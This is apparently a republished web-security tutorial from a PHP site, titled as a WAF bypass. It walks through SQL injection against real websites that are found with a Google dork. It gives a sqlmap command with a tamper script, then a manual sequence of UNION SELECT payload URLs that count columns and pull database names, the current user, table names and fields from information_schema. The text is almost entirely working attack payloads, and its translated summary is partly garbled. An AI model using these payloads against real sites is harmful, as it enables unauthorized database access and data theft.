##0x01.Looking for the target
inurl:.php?id= intext:电器
0x02.Operation
sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
http://*/*.php?id=1+and+1=1 #回显正常 http://*/*.php?id=1+and+1=2 #回显错误 说明存在注入 http://*/*.php?id=1+order+by+15 #15回显错误 http://*/*.php?id=1+order+by+14 #14回显正常 说明有14个字段 http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 #-1让它错误然后执行后面
http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14 #查询当前数据库信息和当前用户 一些常见的函数 version() #显示数据库当前版本 database() / schema() #显示当前数据库名 user() / system_user() / session_user() / current_user() / current_user() #显示当前用户名称 charset(str) #返回字符串str的字符集 collation(str) #返回字符串str的字符排列方式
http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
它不能group_concat,那我就一个一个查了! http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个 http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1 #从2开始取一个
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
Summary: 1. If the tool cannot run, it can only be done by hand Note2. Practice the manual note of mysql
The above is the detailed content of How to conduct analysis to bypass WTS-WAF. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
